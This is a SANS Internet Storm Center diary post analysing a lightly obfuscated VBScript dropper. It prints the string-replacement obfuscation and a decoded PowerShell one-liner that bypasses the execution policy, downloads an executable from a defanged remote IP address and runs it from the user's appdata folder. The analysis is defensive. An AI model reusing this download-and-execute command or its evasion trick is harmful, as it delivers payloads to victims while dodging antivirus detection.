Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Internet Storm Center Internet Storm Center

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Simple but Efficient VBScript Obfuscation

Published: 2020-02-22
Last Updated: 2020-02-22 12:28:38 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonate it into a sandbox by security solutions. This remains quick and (most of the time still) efficient to have a first idea about the code behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be to implement new obfuscation techniques.

This morning, I spotted a very simple VBSscript based on only 50 lines of code. It gets an excellent VT score: 1/60[1] but it was spotted by my hunting rule!

Basically, all suspicious keywords that could trigger a bell are random strings and replaced during the execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object System.net.webclient)" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdata\RiCOAOCAO\Network\Connections\" & rando & "; " _
  & " Start-Process ""$env:appdata\RiCOAOCAO\Network\Connections\" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32\WindowsPowerShell\v1.0\powershell.exe" )
  -Executionpolicy bypass
  -noprofile 
  -windowstyle hidden 
  -command "Set-Content -value (new-object System.net.webclient).downloaddata('http://54[.]233[.]198[.]219/a.exe' ) ) 
                 -encoding byte -Path  $env:appdata\Microsoft\Network\Connections\xxxxxx.exe;
            Start-Process $env:appdata\Microsoft\Network\Connections\xxxxx.exe"

(The dumped payload xxxxx.exe is a random string of 25 characters)

This onliner downloads and executes a payload. Wha about the payload? It’s a Putty client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There are good chances that this piece of code has been submitted to VT by a Red Team or attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???
549d0ef4cb517e78c6a9c4d9de05b6ac

This Portuguese sentence means “lend me 10k there ???”

[1] https://www.virustotal.com/gui/file/e5f242deb5f37eb0754fa214ccb0b00593b348e63f1775a0c9e4529a8f78e1f8/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Quick Analysis of an Encrypted Compound Document Format
Feb 21st 2020
1 day ago by Xme (0 comments)

Whodat? Enumerating Who "owns" a Workstation for IR
Feb 20th 2020
2 days ago by Rob VandenBrink (0 comments)

Discovering contents of folders in Windows without permissions
Feb 18th 2020
4 days ago by Jan (0 comments)

curl and SSPI
Feb 17th 2020
5 days ago by DidierStevens (0 comments)

SOAR or not to SOAR?
Feb 16th 2020
6 days ago by Guy (0 comments)

View All Diaries →

Latest Discussions

Wireshark - To analyze "TCP sequence numbers" or not to analyze.
created Feb 15th 2020
1 week ago by Anonymous (0 replies)

TikTok app possibly using DNS over HTTPS directly
created Feb 15th 2020
1 week ago by jauntysankey (0 replies)

Zip password recovery
created Jan 17th 2020
1 month ago by Anonymous (0 replies)

Strange Google-ish domain name lookups after update to Android 10
created Dec 21st 2019
2 months ago by jauntysankey (0 replies)

SANS IP data inconsistency
created Dec 14th 2019
2 months ago by phbits (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
8 months ago by Brad (0 comments)

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
2 years ago by Brad (0 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
2 years ago by Johannes (0 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
2 years ago by Renato (0 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
2 years ago by Russ McRee (0 comments)